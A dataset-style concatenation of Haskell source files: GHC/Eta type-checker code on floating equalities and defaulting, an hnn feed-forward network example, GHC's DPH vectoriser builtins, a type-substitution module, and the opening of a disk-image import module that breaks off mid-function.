beta! Concrete example is in indexed_types/should_fail/ExtraTcsUntch.hs:
class C x y | x -> y where
op :: x -> y -> ()
instance C [a] [a]
type family F a :: *
h :: F Int -> ()
h = undefined
data TEx where
TEx :: a -> TEx
f (x::beta) =
let g1 :: forall b. b -> ()
g1 _ = h [x]
g2 z = case z of TEx y -> (h [[undefined]], op x [y])
in (g1 '3', g2 undefined)
Note [Solving Family Equations]
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
After we are done with simplification we may be left with constraints of the form:
[Wanted] F xis ~ beta
If 'beta' is a touchable unification variable not already bound in the TyBinds
then we'd like to create a binding for it, effectively "defaulting" it to be 'F xis'.
When is it ok to do so?
1) 'beta' must not already be defaulted to something. Example:
[Wanted] F Int ~ beta <~ Will default [beta := F Int]
[Wanted] F Char ~ beta <~ Already defaulted, can't default again. We
have to report this as unsolved.
2) However, we must still do an occurs check when defaulting (F xis ~ beta), to
set [beta := F xis] only if beta is not among the free variables of xis.
3) Notice that 'beta' can't be bound in ty binds already because we rewrite RHS
of type family equations. See Inert Set invariants in TcInteract.
This solving is now happening during zonking, see Note [Unflattening while zonking]
in TcMType.
*********************************************************************************
* *
* Floating equalities *
* *
*********************************************************************************
Note [Float Equalities out of Implications]
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
For ordinary pattern matches (including existentials) we float
equalities out of implications, for instance:
data T where
MkT :: Eq a => a -> T
f x y = case x of MkT _ -> (y::Int)
We get the implication constraint (x::T) (y::alpha):
forall a. [untouchable=alpha] Eq a => alpha ~ Int
We want to float out the equality into a scope where alpha is no
longer untouchable, to solve the implication!
But we cannot float equalities out of implications whose givens may
yield or contain equalities:
data T a where
T1 :: T Int
T2 :: T Bool
T3 :: T a
h :: T a -> a -> Int
f x y = case x of
T1 -> y::Int
T2 -> y::Bool
T3 -> h x y
We generate constraint, for (x::T alpha) and (y :: beta):
[untouchables = beta] (alpha ~ Int => beta ~ Int) -- From 1st branch
[untouchables = beta] (alpha ~ Bool => beta ~ Bool) -- From 2nd branch
(alpha ~ beta) -- From 3rd branch
If we float the equality (beta ~ Int) outside of the first implication and
the equality (beta ~ Bool) out of the second we get an insoluble constraint.
But if we just leave them inside the implications we unify alpha := beta and
solve everything.
Principle:
We do not want to float equalities out which may
need the given *evidence* to become soluble.
Consequence: classes with functional dependencies don't matter (since there is
no evidence for a fundep equality), but equality superclasses do matter (since
they carry evidence).
-}
floatEqualities :: [TcTyVar] -> Bool
-> WantedConstraints
-> TcS (Cts, WantedConstraints)
-- Main idea: see Note [Float Equalities out of Implications]
--
-- Precondition: the wc_simple of the incoming WantedConstraints are
-- fully zonked, so that we can see their free variables
--
-- Postcondition: The returned floated constraints (Cts) are only
-- Wanted or Derived and come from the input wanted
-- ev vars or deriveds
--
-- Also performs some unifications (via promoteTyVar), adding to
-- monadically-carried ty_binds. These will be used when processing
-- floated_eqs later
--
-- Subtleties: Note [Float equalities from under a skolem binding]
-- Note [Skolem escape]
floatEqualities skols no_given_eqs wanteds@(WC { wc_simple = simples })
| not no_given_eqs -- There are some given equalities, so don't float
= return (emptyBag, wanteds) -- Note [Float Equalities out of Implications]
| otherwise
= do { outer_tclvl <- TcS.getTcLevel
; mapM_ (promoteTyVar outer_tclvl) (varSetElems (tyVarsOfCts float_eqs))
-- See Note [Promoting unification variables]
; traceTcS "floatEqualities" (vcat [ text "Skols =" <+> ppr skols
, text "Simples =" <+> ppr simples
, text "Floated eqs =" <+> ppr float_eqs ])
; return (float_eqs, wanteds { wc_simple = remaining_simples }) }
where
skol_set = mkVarSet skols
(float_eqs, remaining_simples) = partitionBag float_me simples
float_me :: Ct -> Bool
float_me ct -- The constraint is un-flattened and de-cannonicalised
| let pred = ctPred ct
, EqPred NomEq ty1 ty2 <- classifyPredType pred
, tyVarsOfType pred `disjointVarSet` skol_set
, useful_to_float ty1 ty2
= True
| otherwise
= False
-- Float out alpha ~ ty, or ty ~ alpha
-- which might be unified outside
-- See Note [Do not float kind-incompatible equalities]
useful_to_float ty1 ty2
= case (tcGetTyVar_maybe ty1, tcGetTyVar_maybe ty2) of
(Just tv1, _) | isMetaTyVar tv1
, k2 `isSubKind` k1
-> True
(_, Just tv2) | isMetaTyVar tv2
, k1 `isSubKind` k2
-> True
_ -> False
where
k1 = typeKind ty1
k2 = typeKind ty2
{-
Note [Do not float kind-incompatible equalities]
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
If we have (t::* ~ s::*->*), we'll get a Derived insoluble equality.
If we float the equality outwards, we'll get *another* Derived
insoluble equality one level out, so the same error will be reported
twice. So we refrain from floating such equalities
Note [Float equalities from under a skolem binding]
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Which of the simple equalities can we float out? Obviously, only
ones that don't mention the skolem-bound variables. But that is
over-eager. Consider
[2] forall a. F a beta[1] ~ gamma[2], G beta[1] gamma[2] ~ Int
The second constraint doesn't mention 'a'. But if we float it
we'll promote gamma[2] to gamma'[1]. Now suppose that we learn that
beta := Bool, and F a Bool = a, and G Bool _ = Int. Then we'll
we left with the constraint
[2] forall a. a ~ gamma'[1]
which is insoluble because gamma became untouchable.
Solution: float only constraints that stand a jolly good chance of
being soluble simply by being floated, namely ones of form
a ~ ty
where 'a' is a currently-untouchable unification variable, but may
become touchable by being floated (perhaps by more than one level).
We had a very complicated rule previously, but this is nice and
simple. (To see the notes, look at this Note in a version of
TcSimplify prior to Oct 2014).
Note [Skolem escape]
~~~~~~~~~~~~~~~~~~~~
You might worry about skolem escape with all this floating.
For example, consider
[2] forall a. (a ~ F beta[2] delta,
Maybe beta[2] ~ gamma[1])
The (Maybe beta ~ gamma) doesn't mention 'a', so we float it, and
solve with gamma := beta. But what if later delta:=Int, and
F b Int = b.
Then we'd get a ~ beta[2], and solve to get beta:=a, and now the
skolem has escaped!
But it's ok: when we float (Maybe beta[2] ~ gamma[1]), we promote beta[2]
to beta[1], and that means the (a ~ beta[1]) will be stuck, as it should be.
*********************************************************************************
* *
* Defaulting and disamgiguation *
* *
*********************************************************************************
-}
applyDefaultingRules :: Cts -> TcS Bool
-- True <=> I did some defaulting, reflected in ty_binds
-- Return some extra derived equalities, which express the
-- type-class default choice.
applyDefaultingRules wanteds
| isEmptyBag wanteds
= return False
| otherwise
= do { traceTcS "applyDefaultingRules { " $
text "wanteds =" <+> ppr wanteds
; info@(default_tys, _) <- getDefaultInfo
; let groups = findDefaultableGroups info wanteds
; traceTcS "findDefaultableGroups" $ vcat [ text "groups=" <+> ppr groups
, text "info=" <+> ppr info ]
; something_happeneds <- mapM (disambigGroup default_tys) groups
; traceTcS "applyDefaultingRules }" (ppr something_happeneds)
; return (or something_happeneds) }
findDefaultableGroups
:: ( [Type]
, (Bool,Bool) ) -- (Overloaded strings, extended default rules)
-> Cts -- Unsolved (wanted or derived)
-> [[(Ct,Class,TcTyVar)]]
findDefaultableGroups (default_tys, (ovl_strings, extended_defaults)) wanteds
| null default_tys = []
| otherwise = defaultable_groups
where
defaultable_groups = filter is_defaultable_group groups
groups = equivClasses cmp_tv unaries
unaries :: [(Ct, Class, TcTyVar)] -- (C tv) constraints
non_unaries :: [Ct] -- and *other* constraints
(unaries, non_unaries) = partitionWith find_unary (bagToList wanteds)
-- Finds unary type-class constraints
-- But take account of polykinded classes like Typeable,
-- which may look like (Typeable * (a:*)) (Trac #8931)
find_unary cc
| Just (cls,tys) <- getClassPredTys_maybe (ctPred cc)
, Just (kinds, ty) <- snocView tys
, all isKind kinds
, Just tv <- tcGetTyVar_maybe ty
, isMetaTyVar tv -- We might have runtime-skolems in GHCi, and
-- we definitely don't want to try to assign to those!
= Left (cc, cls, tv)
find_unary cc = Right cc -- Non unary or non dictionary
bad_tvs :: TcTyVarSet -- TyVars mentioned by non-unaries
bad_tvs = mapUnionVarSet tyVarsOfCt non_unaries
cmp_tv (_,_,tv1) (_,_,tv2) = tv1 `compare` tv2
is_defaultable_group ds@((_,_,tv):_)
= let b1 = isTyConableTyVar tv -- Note [Avoiding spurious errors]
b2 = not (tv `elemVarSet` bad_tvs)
b4 = defaultable_classes [cls | (_,cls,_) <- ds]
in (b1 && b2 && b4)
is_defaultable_group [] = panic "defaultable_group"
defaultable_classes clss
| extended_defaults = any isInteractiveClass clss
| otherwise = all is_std_class clss && (any is_num_class clss)
-- In interactive mode, or with -XExtendedDefaultRules,
-- we default Show a to Show () to avoid graututious errors on "show []"
isInteractiveClass cls
= is_num_class cls || (classKey cls `elem` [showClassKey, eqClassKey, ordClassKey])
is_num_class cls = isNumericClass cls || (ovl_strings && (cls `hasKey` isStringClassKey))
-- is_num_class adds IsString to the standard numeric classes,
-- when -foverloaded-strings is enabled
is_std_class cls = isStandardClass cls || (ovl_strings && (cls `hasKey` isStringClassKey))
-- Similarly is_std_class
------------------------------
disambigGroup :: [Type] -- The default types
-> [(Ct, Class, TcTyVar)] -- All classes of the form (C a)
-- sharing same type variable
-> TcS Bool -- True <=> something happened, reflected in ty_binds
disambigGroup [] _grp
= return False
disambigGroup (default_ty:default_tys) group
= do { traceTcS "disambigGroup {" (ppr group $$ ppr default_ty)
; fake_ev_binds_var <- TcS.newTcEvBinds
; given_ev_var <- TcS.newEvVar (mkTcEqPred (mkTyVarTy the_tv) default_ty)
; tclvl <- TcS.getTcLevel
; success <- nestImplicTcS fake_ev_binds_var (pushTcLevel tclvl) $
do { solveSimpleGivens loc [given_ev_var]
; residual_wanted <- solveSimpleWanteds wanteds
; return (isEmptyWC residual_wanted) }
; if success then
-- Success: record the type variable binding, and return
do { setWantedTyBind the_tv default_ty
; wrapWarnTcS $ warnDefaulting wanteds default_ty
; traceTcS "disambigGroup succeeded }" (ppr default_ty)
; return True }
else
-- Failure: try with the next type
do { traceTcS "disambigGroup failed, will try other default types }"
(ppr default_ty)
; disambigGroup default_tys group } }
where
wanteds = listToBag (map fstOf3 group)
((_,_,the_tv):_) = group
loc = CtLoc { ctl_origin = GivenOrigin UnkSkol
, ctl_env = panic "disambigGroup:env"
, ctl_depth = initialSubGoalDepth }
{-
Note [Avoiding spurious errors]
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
When doing the unification for defaulting, we check for skolem
type variables, and simply don't default them. For example:
f = (*) -- Monomorphic
g :: Num a => a -> a
g x = f x x
Here, we get a complaint when checking the type signature for g,
that g isn't polymorphic enough; but then we get another one when
dealing with the (Num a) context arising from f's definition;
we try to unify a with Int (to default it), but find that it's
already been unified with the rigid variable from g's type sig
-}
| rahulmutt/ghcvm | compiler/Eta/TypeCheck/TcSimplify.hs | bsd-3-clause | 67,741 | 2 | 19 | 19,203 | 7,419 | 3,895 | 3,524 | 572 | 6 |
import AI.HNN.FF.Network
import Numeric.LinearAlgebra
samples :: Samples Double
samples = [
(fromList [ 1, 1, 1, 1, 1
, 0, 0, 0, 0, 1
, 0, 0, 1, 1, 1
, 0, 0, 0, 0, 1
, 1, 1, 1, 1, 1 ], fromList [1]), -- three
(fromList [ 1, 1, 1, 1, 1
, 0, 0, 0, 0, 1
, 1, 1, 1, 1, 1
, 0, 0, 0, 0, 1
, 1, 1, 1, 1, 1 ], fromList [1]), -- three
(fromList [ 0, 1, 1, 1, 1
, 0, 0, 0, 0, 1
, 0, 0, 0, 1, 1
, 0, 0, 0, 0, 1
, 0, 1, 1, 1, 1 ], fromList [1]), -- three
(fromList [ 1, 1, 1, 1, 1
, 1, 0, 0, 0, 1
, 1, 0, 0, 0, 1
, 1, 0, 0, 0, 1
, 1, 1, 1, 1, 1 ], fromList [0]), -- not a three
(fromList [ 1, 1, 1, 1, 1
, 1, 0, 0, 0, 0
, 1, 0, 0, 0, 0
, 1, 0, 0, 0, 0
, 1, 0, 0, 0, 0 ], fromList [0]), -- not a three
(fromList [ 0, 1, 1, 1, 0
, 0, 1, 0, 1, 0
, 0, 1, 1, 1, 0
, 0, 1, 0, 1, 0
, 0, 1, 1, 1, 0 ], fromList [0]), -- not a three
(fromList [ 0, 0, 1, 0, 0
, 0, 1, 1, 0, 0
, 1, 0, 1, 0, 0
, 0, 0, 1, 0, 0
, 0, 0, 1, 0, 0 ], fromList [0]) ] -- not a three
main :: IO ()
main = do
n <- createNetwork 25 [250] 1
let n' = trainNTimes 10000 0.5 tanh tanh' n samples
mapM_ (print . output n' tanh . fst) samples
putStrLn "-------------"
print . output n' tanh $ testInput
where testInput = fromList [ 0, 0, 1, 1, 1
, 0, 0, 0, 0, 1
, 0, 0, 1, 1, 1
, 0, 0, 0, 0, 1
, 0, 0, 1, 1, 1 ]
{-
OUTPUT:
fromList [0.9996325368507625]
fromList [0.9997784075859734]
fromList [0.9996165887689248]
fromList [-2.8107935971909852e-2]
fromList [7.001808876464477e-3]
fromList [2.54989546107178e-2]
fromList [5.286805464313172e-4]
-------------
fromList [0.9993713524712442]
-}
| alpmestan/hnn | examples/ff/three.hs | bsd-3-clause | 2,044 | 0 | 11 | 879 | 870 | 544 | 326 | 51 | 1 |
-- |Builtin types and functions used by the vectoriser. These are all defined in
-- 'Data.Array.Parallel.Prim'.
module Vectorise.Builtins.Base (
-- * Hard config
mAX_DPH_PROD,
mAX_DPH_SUM,
mAX_DPH_COMBINE,
mAX_DPH_SCALAR_ARGS,
aLL_DPH_PRIM_TYCONS,
-- * Builtins
Builtins(..),
-- * Projections
selTy, selsTy,
selReplicate,
selTags,
selElements,
selsLength,
sumTyCon,
prodTyCon,
prodDataCon,
replicatePD_PrimVar,
emptyPD_PrimVar,
packByTagPD_PrimVar,
combinePDVar,
combinePD_PrimVar,
scalarZip,
closureCtrFun
) where
import GhcPrelude
import TysPrim
import BasicTypes
import Class
import CoreSyn
import TysWiredIn hiding (sumTyCon)
import Type
import TyCon
import DataCon
import NameEnv
import Name
import Outputable
import Data.Array
-- Cardinality of the various families of types and functions exported by the DPH library.
mAX_DPH_PROD :: Int
mAX_DPH_PROD = 5
mAX_DPH_SUM :: Int
mAX_DPH_SUM = 2
mAX_DPH_COMBINE :: Int
mAX_DPH_COMBINE = 2
mAX_DPH_SCALAR_ARGS :: Int
mAX_DPH_SCALAR_ARGS = 8
-- Types from 'GHC.Prim' supported by DPH
--
aLL_DPH_PRIM_TYCONS :: [Name]
aLL_DPH_PRIM_TYCONS = map tyConName [intPrimTyCon, {- floatPrimTyCon, -} doublePrimTyCon]
-- |Holds the names of the types and functions from 'Data.Array.Parallel.Prim' that are used by the
-- vectoriser.
--
data Builtins
= Builtins
{ parrayTyCon :: TyCon -- ^ PArray
, pdataTyCon :: TyCon -- ^ PData
, pdatasTyCon :: TyCon -- ^ PDatas
, prClass :: Class -- ^ PR
, prTyCon :: TyCon -- ^ PR
, preprTyCon :: TyCon -- ^ PRepr
, paClass :: Class -- ^ PA
, paTyCon :: TyCon -- ^ PA
, paDataCon :: DataCon -- ^ PA
, paPRSel :: Var -- ^ PA
, replicatePDVar :: Var -- ^ replicatePD
, replicatePD_PrimVars :: NameEnv Var -- ^ replicatePD_Int# etc.
, emptyPDVar :: Var -- ^ emptyPD
, emptyPD_PrimVars :: NameEnv Var -- ^ emptyPD_Int# etc.
, packByTagPDVar :: Var -- ^ packByTagPD
, packByTagPD_PrimVars :: NameEnv Var -- ^ packByTagPD_Int# etc.
, combinePDVars :: Array Int Var -- ^ combinePD
, combinePD_PrimVarss :: Array Int (NameEnv Var) -- ^ combine2PD_Int# etc.
, scalarClass :: Class -- ^ Scalar
, scalarZips :: Array Int Var -- ^ map, zipWith, zipWith3
, voidTyCon :: TyCon -- ^ Void
, voidVar :: Var -- ^ void
, fromVoidVar :: Var -- ^ fromVoid
, sumTyCons :: Array Int TyCon -- ^ Sum2 .. Sum3
, wrapTyCon :: TyCon -- ^ Wrap
, pvoidVar :: Var -- ^ pvoid
, pvoidsVar :: Var -- ^ pvoids
, closureTyCon :: TyCon -- ^ :->
, closureVar :: Var -- ^ closure
, liftedClosureVar :: Var -- ^ liftedClosure
, applyVar :: Var -- ^ $:
, liftedApplyVar :: Var -- ^ liftedApply
, closureCtrFuns :: Array Int Var -- ^ closure1 .. closure3
, selTys :: Array Int Type -- ^ Sel2
, selsTys :: Array Int Type -- ^ Sels2
, selsLengths :: Array Int CoreExpr -- ^ lengthSels2
, selReplicates :: Array Int CoreExpr -- ^ replicate2
, selTagss :: Array Int CoreExpr -- ^ tagsSel2
, selElementss :: Array (Int, Int) CoreExpr -- ^ elementsSel2_0 .. elementsSel_2_1
, liftingContext :: Var -- ^ lc
}
-- Projections ----------------------------------------------------------------
-- We use these wrappers instead of indexing the `Builtin` structure directly
-- because they give nicer panic messages if the indexed thing cannot be found.
selTy :: Int -> Builtins -> Type
selTy = indexBuiltin "selTy" selTys
selsTy :: Int -> Builtins -> Type
selsTy = indexBuiltin "selsTy" selsTys
selsLength :: Int -> Builtins -> CoreExpr
selsLength = indexBuiltin "selLength" selsLengths
selReplicate :: Int -> Builtins -> CoreExpr
selReplicate = indexBuiltin "selReplicate" selReplicates
selTags :: Int -> Builtins -> CoreExpr
selTags = indexBuiltin "selTags" selTagss
selElements :: Int -> Int -> Builtins -> CoreExpr
selElements i j = indexBuiltin "selElements" selElementss (i, j)
sumTyCon :: Int -> Builtins -> TyCon
sumTyCon = indexBuiltin "sumTyCon" sumTyCons
prodTyCon :: Int -> Builtins -> TyCon
prodTyCon n _
| n >= 2 && n <= mAX_DPH_PROD
= tupleTyCon Boxed n
| otherwise
= pprPanic "prodTyCon" (ppr n)
prodDataCon :: Int -> Builtins -> DataCon
prodDataCon n bi
= case tyConDataCons (prodTyCon n bi) of
[con] -> con
_ -> pprPanic "prodDataCon" (ppr n)
replicatePD_PrimVar :: TyCon -> Builtins -> Var
replicatePD_PrimVar tc bi
= lookupEnvBuiltin "replicatePD_PrimVar" (replicatePD_PrimVars bi) (tyConName tc)
emptyPD_PrimVar :: TyCon -> Builtins -> Var
emptyPD_PrimVar tc bi
= lookupEnvBuiltin "emptyPD_PrimVar" (emptyPD_PrimVars bi) (tyConName tc)
packByTagPD_PrimVar :: TyCon -> Builtins -> Var
packByTagPD_PrimVar tc bi
= lookupEnvBuiltin "packByTagPD_PrimVar" (packByTagPD_PrimVars bi) (tyConName tc)
combinePDVar :: Int -> Builtins -> Var
combinePDVar = indexBuiltin "combinePDVar" combinePDVars
combinePD_PrimVar :: Int -> TyCon -> Builtins -> Var
combinePD_PrimVar i tc bi
= lookupEnvBuiltin "combinePD_PrimVar"
(indexBuiltin "combinePD_PrimVar" combinePD_PrimVarss i bi) (tyConName tc)
scalarZip :: Int -> Builtins -> Var
scalarZip = indexBuiltin "scalarZip" scalarZips
closureCtrFun :: Int -> Builtins -> Var
closureCtrFun = indexBuiltin "closureCtrFun" closureCtrFuns
-- | Get an element from one of the arrays of `Builtins`.
-- Panic if the indexed thing is not in the array.
indexBuiltin :: (Ix i, Outputable i)
=> String -- ^ Name of the selector we've used, for panic messages.
-> (Builtins -> Array i a) -- ^ Field selector for the `Builtins`.
-> i -- ^ Index into the array.
-> Builtins
-> a
indexBuiltin fn f i bi
| inRange (bounds xs) i = xs ! i
| otherwise
= pprSorry "Vectorise.Builtins.indexBuiltin"
(vcat [ text ""
, text "DPH builtin function '" <> text fn <> text "' of size '" <> ppr i <>
text "' is not yet implemented."
, text "This function does not appear in your source program, but it is needed"
, text "to compile your code in the backend. This is a known, current limitation"
, text "of DPH. If you want it to work, you should send mail to ghc-commits@haskell.org"
, text "and ask what you can do to help (it might involve some GHC hacking)."])
where xs = f bi
-- | Get an entry from one of a 'NameEnv' of `Builtins`. Panic if the named item is not in the array.
lookupEnvBuiltin :: String -- Function name for error messages
-> NameEnv a -- Name environment
-> Name -- Index into the name environment
-> a
lookupEnvBuiltin fn env n
| Just r <- lookupNameEnv env n = r
| otherwise
= pprSorry "Vectorise.Builtins.lookupEnvBuiltin"
(vcat [ text ""
, text "DPH builtin function '" <> text fn <> text "_" <> ppr n <>
text "' is not yet implemented."
, text "This function does not appear in your source program, but it is needed"
, text "to compile your code in the backend. This is a known, current limitation"
, text "of DPH. If you want it to work, you should send mail to ghc-commits@haskell.org"
, text "and ask what you can do to help (it might involve some GHC hacking)."])
| ezyang/ghc | compiler/vectorise/Vectorise/Builtins/Base.hs | bsd-3-clause | 8,557 | 0 | 14 | 2,922 | 1,447 | 812 | 635 | 164 | 2 |
-- Time-stamp: <2010-05-14 11:08:06 cklin>
module Substitution where
import Data.List ((\\), union)
import qualified Data.Map as Map
import Types
import Common
import Monad
--------- General substitution utility functions
-- Construct a substitution. This factory function checks that the
-- mapping is idempotent and reports an error otherwise. Note that
-- compoSub (and perhaps other too) can produce identity mappings (e.g.,
-- [x/x]) in the associative list, so the algorithm must sanitize the
-- mapping (to mp0) to avoid tripping the idempotency checking.
makeSub :: [(Int, Type)] -> Subst
makeSub mp =
let mp0 = filter (\(i, t) -> TyMeta i /= t) mp
dom = map fst mp0
rng = unionMap (metaType . snd) mp0
in if overlaps dom rng
then bug "Mapping is not idempotent"
else toMap mp0
zeroSub :: Subst
zeroSub = Map.empty
oneSub :: Int -> Type -> Subst
oneSub = Map.singleton
nullSub :: Subst -> Bool
nullSub = Map.null
-- Compute the domain and the range of a substitution.
domSub :: Subst -> [Int]
domSub = Map.keys
rngSub :: Subst -> [Type]
rngSub = Map.elems
metaSub :: Subst -> [Int]
metaSub sub = domSub sub `union` metaTypes (rngSub sub)
-- Apply a substitution to a type. Since substitution mappings are
-- idempotent, there is no need for iterative application.
zonk :: Subst -> Endo Type
zonk sub = replace where
replace (TyCon tc ax) = TyCon tc (map replace ax)
replace t@(TyMeta i) = Map.findWithDefault t i sub
replace (TySkol i) | Map.member i sub =
bug "Substitution on Skolem type"
replace t = t
-- Apply a substitution directly to a meta type variable index.
zonkIndex :: Subst -> Int -> Type
zonkIndex sub i = Map.findWithDefault (TyMeta i) i sub
-- Rename meta type variables in a type. Unlike substitutions, this
-- dedicated renaming function does not care about the orientation of
-- type variable renaming.
renameMeta :: Rename -> Endo Type
renameMeta ren = replace where
replace (TyCon tc ax) = TyCon tc (map replace ax)
replace (TyMeta i) = TyMeta (lookupZ i ren)
replace t = t
-- Replace free type variables with (supposedly fresh) meta type
-- variables. Not strictly a substitution, but ...
instType :: Map.Map Ident Int -> Endo Type
instType inst = replace where
replace (TyCon tc ax) = TyCon tc (map replace ax)
replace (TyVar tv) = TyMeta (lookupX tv inst)
replace t = t
-- Compute a substitution that forces the second type (t) to have the
-- same top-level type constructor as the first type (c) .
imprintTc :: Type -> Type -> Ti Subst
imprintTc c t =
do u <- freshenTyCon c
unify2 u t
-- The skolemize function computes a substitution that replaces meta
-- type variables with Skolem types that have the same indices. The
-- unskolemize function replace Skolem types to their corresponding meta
-- type variables.
skolemize :: [Int] -> Subst
skolemize = makeSub . map skol
where skol m = (m, TySkol m)
unskolemize :: Endo Type
unskolemize = replace where
replace (TyCon tc ax) = TyCon tc (map replace ax)
replace (TySkol i) = TyMeta i
replace t = t
-- Compose two substitutions. The function uses nub1st to arbitrate
-- (favoring sub2) when the domains overlap. Composition is not
-- commutative, and tv(rng(sub1)) must be disjoint from dom(sub2) with
-- the exception of reverse renaming (see example).
-- zonk sub1 (zonk sub2 t) == zonk (compoSub sub1 sub2) t
-- compoSub [x/y] [y/x] == [x/y]
compoSub :: Subst -> Endo Subst
compoSub sub1 sub2 = makeSub (nub1st (mp2 ++ mp1)) where
mp1 = Map.toList sub1
mp2 = Map.toList (Map.map (zonk sub1) sub2)
compoSubs :: [Subst] -> Subst
compoSubs = foldl compoSub zeroSub
-- Restrict the domain of a substitution.
restrictSub :: [Int] -> Endo Subst
restrictSub mx = Map.filterWithKey relevant
where relevant i _ = i `elem` mx
-- Apply an idempotent variable renaming to a both the domain and the
-- range of a substitution. Here is an example:
-- switchMetaSub [a/x, b/y] [T x/y] == [T a/b]
switchMetaSub :: Rename -> Endo Subst
switchMetaSub ren = makeSub . map switch . Map.toList
where switch (i, t) = (lookupZ i ren, renameMeta ren t)
-- Restrict an idempotent substitution to the parts that have nontrivial
-- effects on the given set of type variables. More specifically, the
-- function restricts the domain to the type variables of interest, and
-- then it eliminates trivial type variable mappings (i.e., renaming).
shaveSub :: [Int] -> Endo Subst
shaveSub mx sub = shaven where
trimmed = restrictSub mx sub
nontriv = multiP (rngSub trimmed)
keep (TyMeta i) = nontriv i || elem i mx
keep _ = True
shaven = Map.filter keep trimmed
-- Extend a substitution such that every meta type variable in the input
-- list dom is in the domain of the extended subsitution.
divertSub :: [Int] -> EndoTi Subst
divertSub dom sub =
do let gap = dom \\ domSub sub
fresh <- freshenTv gap
let fill = makeSub (zip gap fresh)
return (compoSub fill sub)
--------- Plain unification functions
unify :: [Type2] -> Ti Subst
unify [] = return zeroSub
unify ((t1, t2):tx) =
do this <- unify2 t1 t2
let norm (u1, u2) = (zonk this u1, zonk this u2)
rest <- unify (map norm tx)
return (compoSub rest this)
unify2 :: Type -> Type -> Ti Subst
unify2 (TyVar _) _ = bug "Bound type variable in unify2"
unify2 _ (TyVar _) = bug "Bound type variable in unify2"
unify2 (TyMeta i1) (TyMeta i2) | i1 == i2 = return zeroSub
unify2 (TyMeta i1) t2 = unifyMeta i1 t2
unify2 t1 (TyMeta i2) = unifyMeta i2 t1
unify2 (TySkol i1) (TySkol i2) | i1 == i2 = return zeroSub
unify2 (TySkol _) _ = fail "Cannot unify with a Skolem type"
unify2 _ (TySkol _) = fail "Cannot unify with a Skolem type"
unify2 (TyCon tc1 ax1) (TyCon tc2 ax2) =
if tc1 == tc2 && length ax1 == length ax2
then unify (magic $ zip ax1 ax2)
else fail "Cannot unify different type constructors"
unifyMeta :: Int -> Type -> Ti Subst
unifyMeta i t =
if elem i (metaType t)
then fail "Unification produces an infinite type"
else return (oneSub i t)
unifyTypes :: [Type] -> Ti Subst
unifyTypes [] = unify []
unifyTypes tx = unify (zip (tail tx) tx)
-- Unifiability testing. If the given type equations / types are
-- satisfiable, return a most-general unifier as evidence. The function
-- uses trapTi to present a non-monadic interface.
unifiable :: [Type2] -> Maybe Subst
unifiable = trapTi . unify
unifiableTypes :: [Type] -> Maybe Subst
unifiableTypes = trapTi . unifyTypes
--------- Substitution unification algorithm
-- Compute a most-general common instance of the input substitutions.
-- This algorithm is so much simpler than McAdam's substitution
-- unification, and it extends naturally to more than two substitutions.
combineSub :: Subst -> EndoTi Subst
combineSub sub1 sub2 = combineSubs [sub1, sub2]
combineSubs :: [Subst] -> Ti Subst
combineSubs = unify . map1st TyMeta
. concatMap (magic . Map.toAscList)
--------- Substitution orientation bias
-- The "magic" switch controls how the algorithm orients type
-- substitutions, which in turn affects how it picks type parameters and
-- type indices by breaking the symmetry in scrutinee and pattern types.
-- With magic turned off (i.e., magic = id), the algorithm exhibits the
-- bias that type indices come before type parameters. With magic
-- turned on (i.e., magic = reverse), the algorithm exhibits the
-- opposite bias: type parameters come before type indices. The magic
-- does not formally change the expressiveness of Algorithm P, but it
-- does seem to fit currently programming practices better (and it
-- allows the implementation to infer expected types for both runState_o
-- and fdComp1).
magic = reverse
| minad/omega | vendor/algorithm-p/Substitution.hs | bsd-3-clause | 7,807 | 0 | 13 | 1,623 | 1,844 | 954 | 890 | 120 | 4 |
--
-- Copyright (c) 2013 Citrix Systems, Inc.
--
-- This program is free software; you can redistribute it and/or modify
-- it under the terms of the GNU General Public License as published by
-- the Free Software Foundation; either version 2 of the License, or
-- (at your option) any later version.
--
-- This program is distributed in the hope that it will be useful,
-- but WITHOUT ANY WARRANTY; without even the implied warranty of
-- MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
-- GNU General Public License for more details.
--
-- You should have received a copy of the GNU General Public License
-- along with this program; if not, write to the Free Software
-- Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA 02111-1307 USA
--
{-# LANGUAGE PatternGuards #-}
module Import.Images
(
DIM
, ImportedDiskImage (..)
, importDiskImages
, writeDIM
, readDIM
, getDiskImportedPhysPath
, getDiskImportedKeyPath
)
where
import Control.Applicative
import Control.Arrow
import Control.Monad
import Control.Monad.Error
import qualified Control.Exception as E
import Control.Concurrent
import Data.Maybe
import Data.List
import qualified Data.ByteString.Lazy as BL
import Text.Printf
import System.FilePath
import System.IO
import System.Directory
import Tools.Process
import Tools.Misc
import Tools.Text
import Appliance
import VirtualSystem
import Import.Types
import Import.Monad
import Import.Files
import Util
type DIM = [(Maybe DiskID, ImportedDiskImage)]
data ImportedDiskImage
= ImportedDiskImage
{ idiID :: DiskImageID
, idiData :: IDIData }
data IDIData
= IDIData { idiPhysPath :: FilePath
, idiKeyPath :: Maybe FilePath }
idiPhysPath' = idiPhysPath . idiData
idiKeyPath' = idiKeyPath . idiData
serialiseDIMEntry :: (Maybe DiskID, ImportedDiskImage) -> String
serialiseDIMEntry (diskID, idi) =
printf "%s=%s %s %s %s" (q idiIDStr) (q $ idiPhysPath' idi) (q . fromMaybe "" $ idiKeyPath' idi) (q sysid) (q index)
where
q x = replace " " "%20" x
DiskImageID idiIDStr = idiID idi
sysid = case diskID of
Just (DiskID (VirtualSystemID str) _ ) -> str
_ -> ""
index = case diskID of
Just (DiskID _ index) -> show index
_ -> ""
deserialiseDIMEntry :: String -> Maybe (Maybe DiskID, ImportedDiskImage)
deserialiseDIMEntry str =
case split '=' str of
[k, v] -> case split ' ' v of
[path, keypath, sysid, index] | not (null sysid)
, not (null index) -> Just $
( Just (DiskID (VirtualSystemID (dq sysid)) (read (dq index)))
, ImportedDiskImage (DiskImageID (dq k)) (IDIData (dq path) (mkKeyPath $ dq keypath)))
[path, keypath, _, _ ] -> Just $
( Nothing
, ImportedDiskImage (DiskImageID (dq k)) (IDIData (dq path) (mkKeyPath $ dq keypath)))
_ -> Nothing
_ -> Nothing
where
